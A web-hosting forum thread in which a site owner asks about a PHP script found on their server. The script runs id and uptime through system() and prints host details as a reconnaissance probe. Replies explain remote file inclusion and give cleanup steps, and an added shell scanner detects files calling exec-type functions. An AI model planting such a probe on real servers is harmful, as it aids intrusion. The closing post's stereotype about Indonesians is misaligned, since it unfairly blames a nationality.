Hey Guys, Anyone out there have any idea what this script is for? I have a bad feeling some people are trying to obtain my server passwords and information. I have been finding these sites that are running the following script. If you have any idea what this script is meant to do please post. Thanks.

==== script below ====

<?php
// Helper: formats a byte count as b / Kb / Mb / Gb
function ConvertBytes($number) {
    $len = strlen($number);
    if($len < 4) { return sprintf("%d b", $number); }
    if($len >= 4 && $len <=6) { return sprintf("%0.2f Kb", $number/1024); }
    if($len >= 7 && $len <=9) { return sprintf("%0.2f Mb", $number/1024/1024); }
    return sprintf("%0.2f Gb", $number/1024/1024/1024);
}
echo "kangkung<br>";
// Collects host details; uptime and id are run as shell commands via system()
$un = @php_uname();
$up = system(uptime);
$id1 = system(id);
$pwd1 = @getcwd();
$sof1 = getenv("SERVER_SOFTWARE");
$php1 = phpversion();
$name1 = $_SERVER['SERVER_NAME'];
$ip1 = gethostbyname($SERVER_ADDR);
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;
// Prints everything gathered back to the requester
echo "kangkung was here ..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "uptime: $up<br>";
echo "id: $id1<br>";
echo "pwd: $pwd1<br>";
echo "php: $php1<br>";
echo "software: $sof1<br>";
echo "server-name: $name1<br>";
echo "server-ip: $ip1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;

==============================================
I would say that your server had something hacked. The top function looks like it is just for formatting numbers. The bottom code is most likely what the person that hacked the server left to show that they were there. Where did you find this at?
Found this while looking at referrals via cPanel (latest visitors). Do you think they have access to account passwords or? Brian
It could be several things, possibly/hopefully just some injection into a page through an insecure script. Make sure you have exec, shell_exec, system disabled in your php.ini. You may also want to use suPHP, which can help prevent your server from being taken over if someone gains access to PHP. If you have SSH access you should probably search through your entire /home directory and see if this person has gained access to anywhere else. SSH in, go to /home and use something like: find . | xargs grep 'kangkung' -sl Also check your access logs for this person's IP and see where they have been. Is this a shared server or is it yours?
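A way to carry out the two checks above on a shared host: a POSIX sh scanner for PHP files that call shell-execution functions or carry the "kangkung" marker, plus a check that php.ini's disable_functions actually lists them. This is an added example, not code from the thread; the sample files and paths it creates are constructed for the demo.

```shell
#!/bin/sh
# Added example (not from the thread): hunt for files like the one posted
# above and verify the php.ini hardening suggested. Sample data is constructed.

# Scan a web root for PHP files that call shell-execution functions or carry
# the "kangkung" marker. Prints matching paths; returns 0 on hits, 1 if clean.
scan_php_tree() {
    root="$1"
    pattern='(^|[^A-Za-z0-9_])(system|exec|shell_exec|passthru|popen|proc_open)[[:space:]]*\(|kangkung'
    hits=$(find "$root" -type f \( -name '*.php' -o -name '*.phtml' -o -name '*.inc' \) \
        -exec grep -lE "$pattern" {} + 2>/dev/null)
    [ -n "$hits" ] || return 1
    printf '%s\n' "$hits"
}

# Check that php.ini's disable_functions covers every function in the list.
# Returns 0 if all are listed, else prints the missing ones and returns 1.
check_disable_functions() {
    ini="$1"
    listed=$(grep -E '^[[:space:]]*disable_functions[[:space:]]*=' "$ini" | tail -n 1 \
        | cut -d= -f2- | tr -d ' \t"')
    missing=""
    for fn in exec shell_exec system passthru popen proc_open; do
        case ",$listed," in
            *",$fn,"*) ;;
            *) missing="$missing $fn" ;;
        esac
    done
    [ -z "$missing" ] || { printf 'missing:%s\n' "$missing"; return 1; }
}

# Constructed sample tree: one benign page and one file mimicking the posted script.
make_sample_tree() {
    dir=$(mktemp -d)
    mkdir -p "$dir/public_html/images"
    printf '<?php echo "hello"; ?>\n' > "$dir/public_html/index.php"
    printf '<?php $up = system(uptime); echo "kangkung was here ..<br>";\n' \
        > "$dir/public_html/images/x.php"
    printf '%s' "$dir"
}

# Stand-alone demo: run the scanner over the constructed tree.
d=$(make_sample_tree)
scan_php_tree "$d" || echo "no hits"
```

Run it against the real web root (for example `scan_php_tree /home`) and against the live php.ini; a hit is a file to inspect, not proof by itself, since legitimate scripts also call exec().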
This script is used in botnets to test for RFI exploits. Basically your website has been used to spread bots across other servers, congrats. You might want to read up on blocking Perl bots (RFI scanners / DDoSers).
This script is what hackers like to call a "php shell", it is programmed to control your system in a GUI-style interface, or show information about the server. It is included from a remote location and mostly used for holes like Remote File Inclusion. If you find it on your server, remove it as soon as possible. With the information you see now: no, this script is just an information script that shows how useful the targeted server actually is for usage.
No. If you find it on your server, go unplug it, make an image of the hard drive for backup and forensic evidence, find how they hacked you, and reinstall the server. Why does everyone always underestimate the hackings? The title of the thread is "Possible hack attempt" and I see a successful hack. And now the advice given is just "Remove what you see"... but that script is probably not everything left on the server. The server might have been rootkitted and you'd have no way to know. Reinstalling the server and restoring clean backups is the only correct solution to that sort of problem.
I know this isn't for every administrator (it should be though), but doing a little forensic search can easily show you the source of the hack. There is no need to react in an extreme way, especially if you're a reseller. This stuff happens, clients will always upload junk stuff without knowing the possible consequences. The only way to secure yourself is properly updating your server with good software and making sure every single website runs in its own environment, then they can put the evilest php shell on it, your server won't get affected: only the attacked target will.
Something somewhat concerning is that this is a shared server. Your scripts may be completely secure and this hack could have been performed on another account. It would probably be best to notify hostgator of this and get your sites moved to a new server. You should most definitely go through and make sure that none of your scripts were altered as it's completely possible that they coded something that would give them access to your website. You should also make sure that none of your scripts are open to injection or other malicious attacks. As 'uski' suggested the only way to surely get rid of rootkits and a lot of other hacks is to flatten the server and start over. It's very difficult to figure out what was compromised and what was changed to any degree of accuracy.
kangkung is an Indonesian word. These Indonesians are so into hacking. Why is this file in your FTP anyway?